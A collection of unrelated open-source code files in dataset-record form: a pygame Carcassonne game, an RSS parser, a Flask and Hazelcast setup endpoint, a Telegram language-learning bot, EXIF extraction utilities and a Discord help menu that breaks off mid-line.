Should I hard code it?\r\n\t\tfor i in range(len(neighbors)):\r\n\t\t\tif neighbors[i] is not None:\r\n\t\t\t\tif not self.validOrientationSingle(newTile, neighbors[i], self.ordDirs[i]):\r\n\t\t\t\t\tprint(f\"Map.validOrientation: {newTile.orient} is not a valid orientation.\")\r\n\t\t\t\t\treturn False\r\n\t\tprint(f\"Map.validOrientation: {newTile.orient} is a valid orientation.\")\r\n\t\treturn True\r\n\r\n\tdef updateNeighbors(self, newTile, neighborsInput):\r\n\t\tprint(f\"Updating neighbor information for {newTile.tileName} and its neighbors.\")\r\n\t\tnewTile.neighbors = neighborsInput\r\n\t\tfor i in range(len(neighborsInput)):\r\n\t\t\tj = i + 2\r\n\t\t\tif j >= 4:\r\n\t\t\t\tj -= 4\r\n\t\t\tif neighborsInput[i] is not None:\r\n\t\t\t\tneighborsInput[i].neighbors[j] = newTile\r\n\r\n\tdef addTile(self, newTile, pos, orient):\r\n\t\tprint(f\"Map.addTile: Trying to add {newTile.tileName} at {pos} with orient {orient}.\")\r\n\t\tnewTile.pos = pos\r\n\t\tnewTile.orient = orient\r\n\t\tif self.validPosition(pos):\r\n\t\t\tneighbors = self.getNeighbors(pos)\r\n\t\t\tif self.validOrientation(newTile,neighbors):\r\n\t\t\t\tprint(f\"Map.addTile: Adding {newTile.tileName} to the map.\")\r\n\t\t\t\tself.mapElements.append(newTile)\r\n\t\t\t\tself.updateNeighbors(newTile, neighbors)\r\n\t\t\t\tself.getValidPositions() #This recreates the list of valid positions.\r\n\t\t\t\treturn True\r\n\t\t\telse:\r\n\t\t\t\tprint(f\"Map.addTile: Could not add {newTile.tileName} to the map.\")\r\n\t\t\t\tnewTile.pos = (0,0)\r\n\t\t\t\treturn False\r\n\t\telse:\r\n\t\t\tprint(f\"Map.addTile: Could not add {newTile.tileName} to the map.\")\r\n\t\t\tnewTile.pos = (0,0)\r\n\t\t\treturn False\r\n\r\n\tdef visualizeMap(self):\r\n\t\tprint(\"Map.visualizeMap: Creating map visualization.\")\r\n\t\tfor tile in self.mapElements:\r\n\t\t\ttile.visualizeTile()\r\n\r\n\tdef score(self):\r\n\t\tprint(\"Map.score: This is the score.\")\r\n\r\nclass Button:\r\n\r\n\tdef __init__(self, imageDir = os.path.join(os.getcwd(),\"sprites/marker.png\"), pos = None):\r\n\t\tprint(f\"Button.__init__: creating button at {pos}\")\r\n\t\tself.pos = pos\r\n\t\tself.buttonImage = pg.image.load(imageDir).convert()\r\n\t\tself.buttonImage = pg.transform.scale(self.buttonImage, (imageScale, imageScale))\r\n\t\tself.buttonRect = self.buttonImage.get_rect()\r\n\t\tself.buttonRect.left = pos[0] #+ self.buttonRect.width/2\r\n\t\tself.buttonRect.top = pos[1] #+ self.buttonRect.height/2\r\n\r\n\tdef mouseOverButton(self, mouse):\r\n\t\t(mouseX, mouseY) = mouse\r\n\t\t[left, top, width, height] = [i for i in self.buttonRect]\r\n\t\txMin = left\r\n\t\txMax = left + width\r\n\t\tyMin = top\r\n\t\tyMax = top + height\r\n\t\tif xMin <= mouseX <= xMax and yMin <= mouseY <= yMax:\r\n\t\t\tprint(f\"Button.{self.mouseOverButton.__name__}: Button at {np.array(mouse)} selected.\")\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\t#print(f\"Button.{self.mouseOverButton.__name__}: False\")\r\n\t\t\treturn False\r\n\r\n\tdef visualizeButton(self):\r\n\t\tif self.pos is None:\r\n\t\t\twindow.blit(self.buttonImage, self.buttonRect)\r\n\t\t\tpg.display.update()\r\n\t\telse:\r\n\t\t\twindow.blit(self.buttonImage, tuple(self.pos))\r\n\t\t\tpg.display.update()\r\n\r\nif __name__ == '__main__':\r\n\r\n\tpg.init() #What does this do? 
:^) Initializes all imported pygame modules.\r\n\twindow = pg.display.set_mode(pageSize) #Make the window object. set_mode also accepts optional flags and depth arguments.\r\n\tclock = pg.time.Clock()\r\n\r\n\tdeck = Deck() #load deck from file and initialize draw deck of tiles\r\n\tdeck.shuffle() #shuffle the draw deck\r\n\t#print(\"page center: \", np.array(window.get_rect().center))\r\n\ttileMap = Map(deck.draw(),np.array(window.get_rect().center)) #create the map or gameboard where tiles are played\r\n\r\n\t#This is the draw cycle where tiles are repeatedly drawn and placed\r\n\tfor i in range(deck.nTiles -1):\r\n\t\tprint(f\"\\nTurn {i}\")\r\n\r\n\t\tbuttons = [Button(imageDir=os.path.join(os.getcwd(), \"sprites/squareMarker.png\"), pos=validPosition) for validPosition in tileMap.validPositions] # Create a button for each valid position\r\n\t\tfor button in buttons: button.visualizeButton()\r\n\t\ttileMap.visualizeMap()\r\n\r\n\t\tnewTile = deck.draw()\r\n\t\t#newTile.tileInfo()\r\n\t\tnewTile.visualizeTile(style=\"image\")\r\n\t\ttileAdded = False\r\n\r\n\t\t#print(f\"Valid positions are: \\n{tileMap.validPositions}\")\r\n\t\twhile not tileAdded:\r\n\t\t\tclock.tick(7.5) # frames to render per second. TODO: Does this need to go here?\r\n\t\t\tselectedButtonPos = None\r\n\t\t\tfor ev in pg.event.get():\r\n\t\t\t\tif ev.type == pg.QUIT:\r\n\t\t\t\t\tpg.quit()\r\n\t\t\t\telif ev.type == pg.KEYDOWN:\r\n\t\t\t\t\tif ev.key == pg.K_r:\r\n\t\t\t\t\t\tnewTile.rotateTile()\r\n\t\t\t\telif ev.type == pg.MOUSEBUTTONDOWN:\r\n\t\t\t\t\tmouse = pg.mouse.get_pos()\r\n\t\t\t\t\tfor button in buttons:\r\n\t\t\t\t\t\tif button.mouseOverButton(mouse):\r\n\t\t\t\t\t\t\tnewPos = button.pos\r\n\t\t\t\t\t\t\ttileAdded = tileMap.addTile(newTile, newPos, newTile.orient)\r\n\t\t\t\t\t\t\tbreak\r\n\r\n\r\n\r\n\r\n\r\n\t\t\t# userInput = input(\"Provide location and orientation as [x,y,o]: \")\r\n\t\t\t# print(\"\")\r\n\t\t\t# try:\r\n\t\t\t# \tuserInputParsed = eval(userInput)\r\n\t\t\t# \tnewPos = np.array(userInputParsed[:2])\r\n\t\t\t# \tnewOrient = userInputParsed[2]\r\n\t\t\t# \ttileAdded = tileMap.addTile(newTile, newPos, newOrient)\r\n\t\t\t# \tprint(\"\")\r\n\t\t\t# \tbreak\r\n\t\t\t# except:\r\n\t\t\t# \tprint(f\"__main__: could not parse user input.\")\r\n\t\t\t# \tprint(\"\")\r\n\r\npg.quit()\r\n\r\n# class road:\r\n# \tdef __init__(self, owner = None):\r\n# \t\tprint(\"Creating road\")\r\n# \t\tself.owner = owner\r\n\r\n# class city:\r\n# \tdef __init__(self, owner = None):\r\n# \t\tprint(\"Creating city\")\r\n# \t\tself.owner = owner\r\n\r\n# class field:\r\n# \tdef __init__(self, owner = None):\r\n# \t\tprint(\"Creating field\")\r\n# \t\tself.owner = owner","repo_name":"mqjg/Carcassonne","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":16539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
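# Editor's sketch (assumption: side indices 0-11 run clockwise from the top-left
# corner, three per edge, matching the ASCII diagrams in the record above). Rotating
# a tile 90 degrees clockwise is the `sides[-3:] + sides[:-3]` list rotation used in
# Map.validOrientationSingle; this standalone check makes the trick explicit.
def rotated_indices(orient: int) -> list:
    idx = list(range(12))
    for _ in range(orient):
        idx = idx[-3:] + idx[:-3]   # one 90-degree clockwise step
    return idx

assert rotated_indices(1)[:3] == [9, 10, 11]  # the old left edge becomes the top
assert rotated_indices(4) == list(range(12))  # four rotations give the identity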
+{"seq_id":"40848319578","text":"def extractIwilltakeresponsibilityWordpressCom(item):\n\t'''\n\tParser for 'iwilltakeresponsibility.wordpress.com'\n\t'''\n\n\tvol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])\n\tif not (chp or vol) or \"preview\" in item['title'].lower():\n\t\treturn None\n\n\ttagmap = [\n\t\t('refuse to marry the demon emperor: lure and pamper the adorkable concubine', 'refuse to marry the demon emperor: lure and pamper the adorkable concubine', 'translated'),\n\t\t('PRC', 'PRC', 'translated'),\n\t\t('Loiterous', 'Loiterous', 'oel'),\n\t]\n\n\tfor tagname, name, tl_type in tagmap:\n\t\tif tagname in item['tags']:\n\t\t\treturn buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)\n\n\n\treturn False","repo_name":"fake-name/ReadableWebProxy","sub_path":"WebMirror/management/rss_parser_funcs/feed_parse_extractIwilltakeresponsibilityWordpressCom.py","file_name":"feed_parse_extractIwilltakeresponsibilityWordpressCom.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":195,"dataset":"github-code","pt":"91"}
+{"seq_id":"74674237102","text":"import os\nimport uuid\nimport logging\nimport time\n\nfrom flask import (\n Blueprint, jsonify, request\n)\nfrom psycopg2 import connect\nfrom project import db\nfrom project.api.models import Port, Host, EP, RoutingRule, ArionGatewayCluster, ArionNode, VPC\nfrom project.api.settings import node_ips, vnis, hazelcast_ip_port\nfrom project.api.utils import ip_to_int, mac_to_int\nfrom project import db\nimport hazelcast\nfrom project.api.zgcs import set_up_cluster_from_hazelcast\nfrom project.api.vpcs import set_up_vpc_from_hazelcast\nfrom project.api.nodes import set_up_node_from_hazelcast\nfrom project.api.ports import set_up_ports_in_the_same_vpc_from_hazelcast\n\nlogger = logging.getLogger()\n\n# used in creating the hazelcast client, add more elements to the inner map when there is a new added class, the key is the class_id.\nglobal hazelcast_serialization_factory\nhazelcast_serialization_factory = {1: {1: RoutingRule, 2: ArionGatewayCluster, 3: ArionNode, 4:VPC}}\n\nhazelcast_client = None\n\narion_gateway_cluster_map = None\n\nrouting_rule_map = None\n\narion_nodes_map = None\n\nvpc_map = None\n\ndefault_setup_blueprint = Blueprint('default_setup', __name__)\n\n# setup a default zgc cluster with data GET from Hazelcast\n@default_setup_blueprint.route('/default_setup', methods=['GET'])\ndef setup():\n logger.debug(f'Start getting data from Hazelcast')\n\n use_arion_agent_parameter = request.args.get(\"use_arion_agent\", default=None, type=lambda v: v.lower() == 'true')\n\n\n get_data_start_time = time.time()\n connect_to_hazelcast(hazelcast_ip_port)\n\n arion_gateway_cluster_set = arion_gateway_cluster_map.entry_set().result()\n logger.debug(f'GOT {len(arion_gateway_cluster_set)} ArionGatewayClusters from Hazelcast')\n\n arion_nodes_set = arion_nodes_map.entry_set().result()\n logger.debug(f'GOT {len(arion_nodes_set)} ArionNodes from Hazelcast')\n\n vpc_set = vpc_map.entry_set().result()\n logger.debug(f'GOT {len(vpc_set)} VPCs from Hazelcast')\n\n routing_rule_set = routing_rule_map.entry_set().result()\n logger.debug(f'GOT {len(routing_rule_set)} RoutingRules from Hazelcast')\n\n get_data_end_time = time.time()\n logger.debug(f'Finished getting data from Hazelcast, it took {get_data_end_time - get_data_start_time} seconds, now start setting up with the data.')\n\n for cluster_key, cluster in arion_gateway_cluster_set:\n set_up_cluster_from_hazelcast(cluster)\n time.sleep(10)\n\n for node_key, node in arion_nodes_set:\n set_up_node_from_hazelcast(node)\n time.sleep(10)\n\n for vpc_key, vpc_value in vpc_set:\n current_vpc : VPC = vpc_value\n vpc_response = set_up_vpc_from_hazelcast(current_vpc)\n response_object = vpc_response[\"gws\"]\n routing_rules_in_current_vpc = []\n print(f'Current VPC vni: {current_vpc.vni}')\n time.sleep(10)\n if use_arion_agent_parameter == False:\n for routing_rule_key, routing_rule_value in routing_rule_set:\n rule: RoutingRule = routing_rule_value\n if rule.vni == current_vpc.vni:\n routing_rules_in_current_vpc.append(rule)\n set_up_ports_in_the_same_vpc_from_hazelcast(routing_rules_in_current_vpc, current_vpc.vpc_id)\n time.sleep(10)\n else:\n print(f'user_arion_agent={use_arion_agent_parameter}, thus not setting up ports in this call.')\n\n\n setup_finish_time = time.time()\n\n logger.debug(f'Finished setting up, it took {setup_finish_time - get_data_end_time} seconds..')\n\n return jsonify(response_object), 201\n\ndef connect_to_hazelcast(hazelcast_ip_port):\n global hazelcast_client\n hazelcast_client = 
hazelcast.HazelcastClient(\n        cluster_members=[hazelcast_ip_port],\n        data_serializable_factories=hazelcast_serialization_factory)\n    # GET all existing maps from Hazelcast\n    global arion_gateway_cluster_map\n    arion_gateway_cluster_map = hazelcast_client.get_map('com.futurewei.common.model.ArionGatewayCluster')\n\n    global arion_nodes_map\n    arion_nodes_map = hazelcast_client.get_map('com.futurewei.common.model.ArionNode')\n\n    global vpc_map\n    vpc_map = hazelcast_client.get_map('com.futurewei.common.model.VPC')\n\n    global routing_rule_map\n    # new table name: com.futurewei.common.model.NeighborRule\n    routing_rule_map = hazelcast_client.get_map('com.futurewei.common.model.NeighborRule')\n\n    # note: both listeners below report the size of routing_rule_map, no matter which map fired the event\n    def added(event):\n        number_of_entries_in_map = len(routing_rule_map.entry_set().result())\n        logger.info(\n            f'Entry is added to the map, now the map has {number_of_entries_in_map} entries')\n\n    def removed(event):\n        number_of_entries_in_map = len(routing_rule_map.entry_set().result())\n        logger.info(\n            f'Entry is removed from the map, now the map has {number_of_entries_in_map} entries')\n\n    # add listeners to the maps; a listener is called when an entry is added to / removed from the map\n    arion_gateway_cluster_map.add_entry_listener(include_value=True, added_func=added)\n    arion_gateway_cluster_map.add_entry_listener(include_value=True, removed_func=removed)\n\n    arion_nodes_map.add_entry_listener(include_value=True, added_func=added)\n    arion_nodes_map.add_entry_listener(include_value=True, removed_func=removed)\n\n    vpc_map.add_entry_listener(include_value=True, added_func=added)\n    vpc_map.add_entry_listener(include_value=True, removed_func=removed)\n\n    routing_rule_map.add_entry_listener(include_value=True, added_func=added)\n    routing_rule_map.add_entry_listener(include_value=True, removed_func=removed)\n    logger.info('Finished setting up with Hazelcast.')\n    return","repo_name":"futurewei-cloud/arion-dp","sub_path":"src/mgmt/manager/project/api/default_setup.py","file_name":"default_setup.py","file_ext":"py","file_size_in_byte":5616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
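# Editor's sketch: a stripped-down version of the Hazelcast wiring in the record above,
# useful for testing the listener behaviour in isolation. The address 127.0.0.1:5701
# and the map name "demo" are placeholders; only HazelcastClient, get_map and
# add_entry_listener are taken from the file itself (the client returns futures, hence
# the .result() calls, matching the original's entry_set().result() usage).
import hazelcast

client = hazelcast.HazelcastClient(cluster_members=["127.0.0.1:5701"])
demo_map = client.get_map("demo")

def on_added(event):
    print(f"entry added, map now has {len(demo_map.entry_set().result())} entries")

demo_map.add_entry_listener(include_value=True, added_func=on_added)
demo_map.put("k", "v").result()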
+{"seq_id":"4554538296","text":"from aiogram import types\nfrom aiogram.types import CallbackQuery\nfrom main import dp\nfrom bot.keyboards import buttons_menu\nfrom bot.create_offer_and_send import game\nfrom bot.data import del_old_messege\nfrom bot.callback_datas import play_collback\nfrom main import db\n\n\n@dp.message_handler(commands=\"start\")\nasync def start(message: types.Message):\n    msid = await message.answer(\"Welcome to the bot for learning English\\n\"\n                                \"Use the /info command for information about what the bot can do\\n\"\n                                \"To start studying, press /Play\")\n    # reply_markup=buttons_menu())\n    # delete the \"start\" message\n    await message.delete()\n    # delete all messages marked for deletion\n    await del_old_messege(msid)\n    # record the sent message in the DB and mark it for later deletion\n    db.add_message(id_chat=msid.chat['id'], id_message=msid['message_id'], delete=1)\n    # await save_info_messege(msid)\n\n@dp.message_handler(commands=\"info\")\nasync def info(message: types.Message):\n    msid = await message.answer(\"Information about how the bot works, and the command to start testing, will appear here later\\n\"\n                                \"To start studying, press /Play\")\n    # reply_markup=buttons_menu()) # /start\n    # delete the \"info\" message\n    await message.delete()\n    # delete all messages marked for deletion\n    await del_old_messege(msid)\n    # record the sent message in the DB and mark it for later deletion\n    db.add_message(id_chat=msid.chat['id'], id_message=msid['message_id'], delete=1)\n\n\n@dp.message_handler(commands=\"play\")\nasync def play(message: types.Message):\n    # delete the \"play\" message\n    await message.delete()\n    # delete all messages marked for deletion\n    await del_old_messege(message)\n    # start the function that sends a word\n    await game(message)\n\n@dp.message_handler(commands=\"next_play\")\nasync def next_play(message: types.Message):\n    # delete the message\n    await message.delete()\n    # delete all messages marked for deletion\n    await del_old_messege(message)\n    # start the function that sends a word\n    await game(message)\n\n\n@dp.callback_query_handler(play_collback.filter(yes_or_no=\"yes\"))\nasync def inline_yes(call: CallbackQuery, callback_data: dict):\n    await call.answer()\n    # msid = await call.message.answer(f\"Great, you have memorized these words and this sentence structure!\",\n    #                                  reply_markup=buttons_menu())\n    await call.message.edit_reply_markup()\n\n    # delete all messages marked for deletion\n    # await del_old_messege(msid)\n    # record the sent message in the DB and mark it for later deletion\n    # db.add_message(id_chat=msid.chat['id'], id_message=msid['message_id'], delete=1)\n    # the answer was correct, so mark it with 1\n    db.update(id_chat=call.message.chat.id, id_message=call.message.message_id, status=1)\n    # await statistics(message=msid, yes=True)\n\n@dp.callback_query_handler(play_collback.filter(yes_or_no=\"no\"))\nasync def inline_no(call: CallbackQuery, callback_data: dict):\n    await call.answer()\n    # msid = await call.message.answer(f\"You need to learn the words used and review the sentence structure\",\n    #                                  reply_markup=buttons_menu())\n    await call.message.edit_reply_markup()\n\n    # delete all messages marked for deletion\n    # await del_old_messege(msid)\n    # record the sent message in the DB and mark it for later deletion\n    # db.add_message(id_chat=msid.chat['id'], id_message=msid['message_id'], delete=1)\n    # the answer was wrong, so mark it with 0\n    db.update(id_chat=call.message.chat.id, id_message=call.message.message_id, status=0)\n    # await statistics(message=msid, no=True)\n\n@dp.message_handler(text=\"Статистика\")  # \"Статистика\" (\"Statistics\") is the button label defined in bot.keyboards\nasync def show_statistics(message: types.Message):\n    # query the DB for all word messages; returns a tuple\n    stat = db.statistics(id_chat=message.chat.id)\n    if any(stat):\n        mes = await message.answer(f\"{stat[0]} question(s) asked in total\\n\"\n                                   f\"{stat[1]} question(s) answered correctly\\n\"\n                                   f\"{stat[2]} question(s) answered incorrectly\",\n                                   reply_markup=buttons_menu())\n    else:\n        mes = await message.answer(\"You have not answered a single question yet\", reply_markup=buttons_menu())\n\n    # delete the \"Статистика\" message\n    await message.delete()\n    # delete all messages marked for deletion\n    await del_old_messege(message)\n    # record the sent message in the DB and mark it for later deletion\n    db.add_message(id_chat=mes.chat['id'], id_message=mes['message_id'], delete=1)\n\n# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n# handlers_user, a test handler!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n\n@dp.message_handler(commands=[\"user\"])\nasync def user_start(message: types.Message):\n    mes = message.chat\n    n = db.select_all_chat()\n    info_message = await message.answer(f\"Hello, user! Your details - {mes}\\nTotal number of users of this bot - {len(n)}.\\n{n}\", reply_markup=buttons_menu())\n    # delete all messages marked for deletion\n    await del_old_messege(message)\n    # delete the message\n    await message.delete()\n    # record the sent message in the DB and mark it for later deletion\n    db.add_message(id_chat=info_message.chat['id'], id_message=info_message['message_id'], delete=1)\n\n# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n# This handler must stay last; it simply deletes whatever message was sent!!!!!!!!!!!!!!!!!\n# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n\n@dp.message_handler()\nasync def bot_echo(message: types.Message):\n    # \"This handler does not send anything\"\n    await message.delete()","repo_name":"Misha1601/MyEnglishTeacherBot","sub_path":"bot/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":7670,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"34595452155","text":"import pandas as pd\nimport exifread\nimport os\nimport logging\n\nfrom pathlib import Path\nfrom typing import List\nfrom multiprocessing import Pool\nfrom .clean import clean_exif_data\n\n\npicture_globs = [\"*.jpg\", \"*.jpeg\", \"*.png\", \"*.JPG\", \"*.JPEG\", \"*.PNG\"]\n\nPROCESSES_DEFAULT = 5\n\n\ndef get_extension(filename):\n filename, file_extension = os.path.splitext(filename)\n return file_extension.lower()\n\n\ndef get_pictures(directory: Path):\n pics = []\n for glob in picture_globs:\n pics.extend(directory.rglob(glob))\n return pics\n\n\ndef get_exif(path):\n with open(path, \"rb\") as f:\n return clean_exif_data(path, exifread.process_file(f))\n\n\ndef simple_extract_exif(fnames: List[Path]):\n return [get_exif(f) for f in fnames]\n\n\ndef multiprocess_extract_exif(fnames: List[Path], processes: int):\n with Pool(processes) as pool:\n return pool.map(get_exif, fnames)\n\n\ndef get_panda_df(folder_names, processes=PROCESSES_DEFAULT, existing_df=None):\n pics_filenames = []\n for folder in folder_names:\n abs_path = Path(folder).resolve()\n pics_filenames.extend(get_pictures(abs_path))\n\n if existing_df is not None:\n existing_rows = set([Path(p) for p in existing_df[\"filename\"].values])\n pics_filenames = list(set(pics_filenames) - set(existing_rows))\n\n imgs_to_scan = len(pics_filenames)\n\n logging.info(f\"Scanning {imgs_to_scan} new photos\")\n if imgs_to_scan > 1000:\n logging.info(f\"Using {processes} processes. \")\n cleaned_data = multiprocess_extract_exif(pics_filenames, processes)\n else:\n cleaned_data = simple_extract_exif(pics_filenames)\n\n if existing_df is not None:\n cleaned_data.extend(existing_df.to_dict(orient=\"records\"))\n return pd.DataFrame(cleaned_data)\n","repo_name":"Visgean/exif2pandas","sub_path":"exif2pandas/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"91"}
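# Editor's note: a hypothetical usage sketch for the exif2pandas utilities in the
# record above. The folder path and the pickle filename are placeholders; the
# incremental re-scan works because get_panda_df drops filenames already present in
# `existing_df` before extracting EXIF data again.
import pandas as pd

df = get_panda_df(["./photos"], processes=5)
df.to_pickle("exif.pkl")

# A later run only scans photos that are not already in the saved frame:
df = get_panda_df(["./photos"], existing_df=pd.read_pickle("exif.pkl"))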
+{"seq_id":"21383205113","text":"import discord, os, logging, json, time, random, motor, aiohttp\nfrom discord.ext import commands, tasks\nfrom discord.utils import get\nfrom datetime import datetime as dt\nfrom colorama import Fore as f\nimport button_paginator as pg\nfrom Core import utils as util\nfrom Core.utils import get_theme\n\ndef get_cmds(bot, command:str):\n\texmp3 = [c.qualified_name for c in bot.get_command(command).walk_commands()]\n\texpm_str3 = ','.join(exmp3)\n\tfinal_data = expm_str3.replace(command, '')\n\treturn final_data\n\nasync def format_results(ctx, bot, command: str):\n\tcmds = [c.qualified_name for c in bot.get_command(command).walk_commands()]\n\tdescrips = [c.description for c in bot.get_command(command).walk_commands()]\n\talias = [\", \".join(c.aliases) for c in bot.get_command(command).walk_commands()]\n\tfinal = [f\"**``{ctx.prefix}{cmds}`` · ``({alias})``** | *{descrips}*\\n\" for cmds, alias, descrips in zip(cmds, alias, descrips)]\n\tdes = \"\"\n\tfor i in final:\n\t\tdes+= f\"{i}\"\n\tembed = discord.Embed(title=f\"All {command} commands\", description=f\"**Commands:**\\n{des}\", color=int(await get_theme(self=bot, bot=bot, guild=ctx.guild.id), 16))\n\tembed.set_author(name='blame help & command overview', icon_url=ctx.me.display_avatar.url)\n\tembed.set_footer(text=f\"{ctx.prefix}help [command] for more info on the command.\")\n\treturn embed\n\n\nclass Dropdown(discord.ui.Select):\n\tdef __init__(self, ctx, bot):\n\t\tself.bot = bot\n\t\tself.ctx = ctx\n\t\toptions = [\n\t\t\tdiscord.SelectOption(label='General', description='Main menu'),\n\t\t\tdiscord.SelectOption(label='Autopfp', description=f\"⭐ Premium ⭐\"),\n\t\t\tdiscord.SelectOption(label='Anti-Invite', description=get_cmds(bot=self.bot, command='anti-invite')),\n\t\t\tdiscord.SelectOption(label='Antiraid', description=get_cmds(bot=self.bot, command='antiraid')),\n\t\t\tdiscord.SelectOption(label='Antinuke', description=\"Too many..\"),\n\t\t\tdiscord.SelectOption(label='Autoresponder', description=get_cmds(bot=self.bot, command='autoresponder')),\n\t\t\tdiscord.SelectOption(label='Autorole', description=get_cmds(bot=self.bot, command='autorole')),\n\t\t\tdiscord.SelectOption(label='BoostMsg', description=get_cmds(bot=self.bot, command='boostmsg')),\n\t\t\tdiscord.SelectOption(label='Boosterrole', description=get_cmds(bot=self.bot, command='boosterrole')),\n\t\t\tdiscord.SelectOption(label='FakePerms', description=get_cmds(bot=self.bot, command='fakeperms')),\n\t\t\tdiscord.SelectOption(label='Forcenick', description=get_cmds(bot=self.bot, command='forcenick')),\n\t\t\tdiscord.SelectOption(label='Game', description=get_cmds(bot=self.bot, command='game')),\n\t\t\tdiscord.SelectOption(label='Goodbye', description=\"Too many..\"),\n\t\t\tdiscord.SelectOption(label='Joindm', description=get_cmds(bot=self.bot, command='joindm')),\n\t\t\tdiscord.SelectOption(label='Logging', description=get_cmds(bot=self.bot, command='logging')),\n\t\t\tdiscord.SelectOption(label='LastFM', description=\"Too many..\"),\n\t\t\tdiscord.SelectOption(label='Juul', description=get_cmds(bot=self.bot, command='juul')),\n\t\t\tdiscord.SelectOption(label='Pfp', description=get_cmds(bot=self.bot, command='pfp')),\n\t\t\tdiscord.SelectOption(label='PingOnJoin', description=get_cmds(bot=self.bot, command='poj')),\n\t\t\tdiscord.SelectOption(label='React', description=get_cmds(bot=self.bot, command='react')),\n\t\t\tdiscord.SelectOption(label='ReactionRoles', description=get_cmds(bot=self.bot, 
command='reaction')),\n\t\t\tdiscord.SelectOption(label='Tags', description=get_cmds(bot=self.bot, command='tags')),\n\t\t\t#discord.SelectOption(label='Twitch Notifications', description=\"Too many..\"),\n\t\t\tdiscord.SelectOption(label='Voicemaster', description=get_cmds(bot=self.bot, command='voice')),\n\t\t\tdiscord.SelectOption(label='Webhooks', description=get_cmds(bot=self.bot, command='webhook')),\n\t\t\tdiscord.SelectOption(label='Welcome', description=\"Too many..\")]\n\t\tsuper().__init__(placeholder='General', min_values=1, max_values=1, options=options)\n\n\tasync def callback(self, interaction: discord.Interaction):\n\t\thelp_type = self.values[0]\n\t\tif help_type == 'General':\n\t\t\tgeneral_embed = discord.Embed(color=000000).set_author(name='blame help & command overview', icon_url=self.ctx.me.display_avatar.url).set_footer(text=f\"The Blame Team ・ Commands: {sum(1 for i in self.bot.walk_commands())}\").add_field(name=\"__Top command__ ``antinuke``\", value=\"*Set a channel that blame will autosend pfps to every five minutes.*\", inline=False).add_field(name=\"\\n__Commands__\", value=\"- View our commands on our **[documentation](https://docs.blame.gg) (in development)**\\n- Or use the dropdown below this message to pick a category\", inline=False).add_field(name=\"__Links__\", value=\"[Help](https://docs.blame.gg) - [Invite the bot](https://discord.com/api/oauth2/authorize?client_id=776128410547126322&permissions=8&scope=bot) - [Support server](https://discord.gg/Xa2ZJr4atx) - [Donate](https://cash.app/$blameW)\")\n\t\t\tawait interaction.response.defer()\n\t\t\tawait interaction.message.edit(embed=general_embed)\n\t\telse:\n\t\t\tawait interaction.response.defer()\n\t\t\tawait interaction.message.edit(embed=await format_results(ctx=self.ctx, bot=self.bot, command=help_type))\n\n\nclass DropdownView(discord.ui.View):\n\tdef __init__(self,ctx, bot):\n\t\tself.ctx = ctx\n\t\tsuper().__init__()\n\n\t\t# Adds the dropdown to our view object.\n\t\tself.add_item(Dropdown(ctx, bot))\n\nclass MyHelp(commands.HelpCommand):\n\tasync def send_bot_help(self, mapping):\n\t\tctx=self.context\n\t\tbot=ctx.bot\n\t\tasync with ctx.typing():\n\t\t\ttry:\n\t\t\t\tview = DropdownView(ctx, bot)\n\t\t\t\tgeneral_embed = discord.Embed(color=int(await get_theme(self, bot=bot, guild=ctx.guild.id), 16)).set_author(name='blame help & command overview', icon_url=ctx.me.display_avatar.url).set_footer(text=f\"The Blame Team ・ Commands: {sum(1 for i in bot.walk_commands())}\").add_field(name=\"__Top command__ ``autopfp``\", value=\"*Set a channel that blame will autosend pfps to every five minutes.*\", inline=False).add_field(name=\"\\n__Commands__\", value=\"- View our commands on our **[documentation](https://docs.blame.gg) (in development)**\\n- Or use the dropdown below this message to pick a category\", inline=False).add_field(name=\"__Links__\", value=\"[Help](https://docs.blame.gg) - [Invite the bot](https://discord.com/api/oauth2/authorize?client_id=776128410547126322&permissions=8&scope=bot) - [Support server](https://discord.gg/Xa2ZJr4atx) - [Donate](https://cash.app/$blameW)\")\n\t\t\t\treturn await ctx.send(embed=general_embed, view=view)\n\n\t\t\texcept Exception as e:\n\t\t\t\tprint(e)\n\n\tasync def send_command_help(self, command):\n\t\ttry:\n\t\t\tctx=self.context\n\t\t\tbot=ctx.bot\n\t\t\tasync with ctx.typing():\n\t\t\t\tembed = discord.Embed(title=f\"Command: {command.qualified_name}\", description=f\"{command.description}\", color=int(await get_theme(self, bot=bot, 
